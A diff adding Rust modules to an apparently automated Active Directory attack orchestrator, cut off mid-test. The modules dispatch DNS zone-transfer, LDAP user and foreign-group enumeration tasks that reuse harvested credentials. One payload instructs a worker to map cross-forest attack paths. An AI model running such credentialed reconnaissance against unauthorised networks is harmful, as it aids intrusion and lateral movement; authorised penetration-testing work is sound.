-0,0 +1,398 @@ +//! auto_dns_enum -- DNS zone transfer and record enumeration. +//! +//! Attempts AXFR zone transfers and enumerates DNS records (SRV, A, CNAME) +//! from each discovered DC. DNS records reveal additional hosts, services, +//! and naming conventions that port scanning alone may miss. +//! +//! Zone transfers are often allowed from domain-joined machines, and even +//! when blocked, DNS SRV record enumeration reveals AD-registered services +//! (e.g., _msdcs, _kerberos, _ldap, _gc, _http). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DNS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_dns_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dns_enum_work(state: &StateInner) -> Vec { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("dns_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DNS_ENUM, &dedup_key) { + continue; + } + + // DNS enum can work without creds (zone transfer, SRV queries) + // but we pass creds if available for authenticated queries + let cred = state + .credentials + .iter() + .find(|c| !c.password.is_empty() && c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + + items.push(DnsEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// DNS enumeration per domain. +/// Interval: 45s. +pub async fn auto_dns_enum(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dns_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_dns_enum_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "dns_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + }); + + if let Some(ref cred) = item.credential { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + let priority = dispatcher.effective_priority("dns_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "DNS enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DNS_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DNS_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "DNS enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch DNS enumeration"); + } + } + } + } +} + +struct DnsEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("dns_enum:{}", "contoso.local"); + assert_eq!(key, "dns_enum:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("dns_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DNS_ENUM, "dns_enum"); + } + + #[test] + fn no_cred_required() { + // DNS enum works without credentials for zone transfer / SRV queries + let cred: Option = None; + assert!(cred.is_none()); + } + + #[test] + fn payload_without_cred() { + let payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + assert!(payload.get("credential").is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + assert_eq!(payload["technique"], "dns_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn payload_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let mut payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + payload["credential"] = serde_json::json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert!(work.credential.is_none()); + } + + #[test] + fn work_struct_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: Some(cred), + }; + assert!(work.credential.is_some()); + assert_eq!(work.credential.unwrap().username, "admin"); + } + + #[test] + fn dedup_key_domain_based() { + let domain1 = "contoso.local"; + let domain2 = "fabrikam.local"; + let key1 = format!("dns_enum:{}", domain1.to_lowercase()); + let key2 = format!("dns_enum:{}", domain2.to_lowercase()); + assert_ne!(key1, key2); + assert_eq!(key1, "dns_enum:contoso.local"); + assert_eq!(key2, "dns_enum:fabrikam.local"); + } + + #[test] + fn case_normalization_mixed() { + let key = format!("dns_enum:{}", "Contoso.Local".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].credential.is_some()); + assert_eq!(work[0].credential.as_ref().unwrap().username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_DNS_ENUM, "dns_enum:contoso.local".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_empty_password_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + // Empty password cred should not be selected + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_cred_only_matches_same_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + // Cross-domain cred should NOT be selected (dns_enum only matches same domain) + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dns_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert!(work[0].credential.is_some()); + } +} diff --git a/ares-cli/src/orchestrator/automation/domain_user_enum.rs b/ares-cli/src/orchestrator/automation/domain_user_enum.rs new file mode 100644 index 00000000..2dda9eb9 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/domain_user_enum.rs @@ -0,0 +1,436 @@ +//! auto_domain_user_enum -- explicit per-domain LDAP user enumeration. +//! +//! Unlike initial recon (which does broad DC scanning), this module dispatches +//! targeted LDAP user enumeration per domain using the best available credential. +//! This fills the gap where a trusted domain's users are not enumerated because +//! the initial recon agent only has primary-domain credentials. +//! +//! Dispatches `ldap_user_enumeration` to the recon role for each domain that +//! has a DC but hasn't been fully enumerated yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect user enumeration work items from current state. +/// +/// Pure logic extracted from `auto_domain_user_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_user_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("user_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DOMAIN_USER_ENUM, &dedup_key) { + continue; + } + + // Prefer a credential from the target domain. + // Fall back to any available credential (cross-domain LDAP may work). + let cred = match state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(UserEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Dispatches per-domain LDAP user enumeration. +/// Interval: 45s. +pub async fn auto_domain_user_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("domain_user_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_user_enum_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("domain_user_enumeration"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + "Domain user enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DOMAIN_USER_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DOMAIN_USER_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Domain user enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch user enumeration"); + } + } + } + } +} + +struct UserEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("user_enum:{}", "contoso.local"); + assert_eq!(key, "user_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DOMAIN_USER_ENUM, "domain_user_enum"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn ldap_filter_format() { + let filters = ["(objectCategory=person)(objectClass=user)"]; + assert_eq!(filters.len(), 1); + assert!(filters[0].contains("objectCategory=person")); + assert!(filters[0].contains("objectClass=user")); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "description", + "memberOf", + "userAccountControl", + "servicePrincipalName", + ]; + assert_eq!(attrs.len(), 5); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"servicePrincipalName")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = UserEnumWork { + dedup_key: "user_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("user_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "user_enum:contoso.local"); + } + + #[test] + fn credential_quarantine_check_logic() { + // Empty password should be skipped by the credential selection logic + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "".into(), + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + assert!(cred.password.is_empty()); + } + + #[test] + fn cross_domain_credential_fallback() { + // When no same-domain cred exists, any cred can be used (cross-domain LDAP) + let creds = [ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }]; + let target_domain = "contoso.local"; + let same_domain = creds.iter().find(|c| { + c.domain.to_lowercase() == target_domain.to_lowercase() && !c.password.is_empty() + }); + assert!(same_domain.is_none()); + let fallback = creds.iter().find(|c| !c.password.is_empty()); + assert!(fallback.is_some()); + assert_eq!(fallback.unwrap().domain, "fabrikam.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DOMAIN_USER_ENUM, "user_enum:contoso.local".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "user_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/foreign_group_enum.rs b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs new file mode 100644 index 00000000..02ab73be --- /dev/null +++ b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs @@ -0,0 +1,471 @@ +//! auto_foreign_group_enum -- enumerate cross-domain/cross-forest group memberships. +//! +//! Discovers foreign security principals (FSPs) — users/groups from one domain +//! that are members of groups in another domain. This reveals cross-forest and +//! cross-domain attack paths that BloodHound's intra-domain analysis might miss. +//! +//! Dispatches LDAP queries per trust relationship to find: +//! - Foreign users in local groups (e.g., FABRIKAM\jdoe in CONTOSO\TrustedAdmins) +//! - Foreign groups nested in local groups +//! - Domain Local groups with foreign members (the primary FSP container) + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect foreign group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_foreign_group_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_foreign_group_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() || state.domains.len() < 2 { + return Vec::new(); + } + + let mut items = Vec::new(); + + // For each domain, enumerate foreign security principals + for domain in &state.domains { + let dedup_key = format!("foreign_group:{domain}"); + if state.is_processed(DEDUP_FOREIGN_GROUP_ENUM, &dedup_key) { + continue; + } + + let dc_ip = match state.resolve_dc_ip(domain) { + Some(ip) => ip, + None => continue, + }; + + // Find a credential for this domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(ForeignGroupWork { + dedup_key, + domain: domain.clone(), + dc_ip, + credential: cred, + }); + } + + items +} + +/// Enumerate cross-domain foreign group memberships. +/// Interval: 45s. +pub async fn auto_foreign_group_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("foreign_group_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_foreign_group_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": [ + "(objectClass=foreignSecurityPrincipal)", + "(&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4))" + ], + "attributes": [ + "sAMAccountName", "member", "memberOf", "objectSid", + "groupType", "cn", "distinguishedName" + ], + "instructions": concat!( + "Enumerate Foreign Security Principals and cross-domain group memberships. ", + "1) Query CN=ForeignSecurityPrincipals,DC=... to list all foreign SIDs. ", + "2) Resolve each SID to its source domain user/group using ldapsearch against ", + "the source domain's DC. ", + "3) Query Domain Local groups (groupType bit 4) and check for foreign members. ", + "4) Report each cross-domain membership: source_domain\\source_user -> target_group ", + "(target_domain). These are critical for cross-forest attack paths. ", + "5) Register any discovered cross-domain memberships as vulnerabilities with ", + "vuln_type='foreign_group_membership', source=foreign_user, target=local_group, ", + "domain=target_domain, source_domain=foreign_domain.\n\n", + "IMPORTANT: For each user discovered during FSP enumeration, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"foreign_group_enumeration\", \"memberOf\": [\"Group1\"]}\n", + "Include ALL users found — both foreign principals and local group members." + ), + }); + + let priority = dispatcher.effective_priority("foreign_group_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Foreign group enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_FOREIGN_GROUP_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_FOREIGN_GROUP_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Foreign group enum deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch foreign group enum"); + } + } + } + } +} + +struct ForeignGroupWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("foreign_group:{}", "contoso.local"); + assert_eq!(key, "foreign_group:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_FOREIGN_GROUP_ENUM, "foreign_group_enum"); + } + + #[test] + fn requires_multiple_domains() { + let domains: Vec = vec!["contoso.local".to_string()]; + assert!( + domains.len() < 2, + "Single domain should skip foreign group enum" + ); + } + + #[test] + fn two_domains_meets_requirement() { + let domains: Vec = vec!["contoso.local".to_string(), "fabrikam.local".to_string()]; + assert!(domains.len() >= 2); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = ForeignGroupWork { + dedup_key: "foreign_group:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_per_domain() { + let key1 = format!("foreign_group:{}", "contoso.local"); + let key2 = format!("foreign_group:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn foreign_security_principal_resolution() { + // The payload includes credential for cross-domain FSP resolution + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + // FSP resolution happens via the credential against the target domain + assert!(payload.get("credential").is_some()); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + // Requires at least 2 domains + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_two_domains_with_creds() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_FOREIGN_GROUP_ENUM, + "foreign_group:contoso.local".into(), + ); + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + 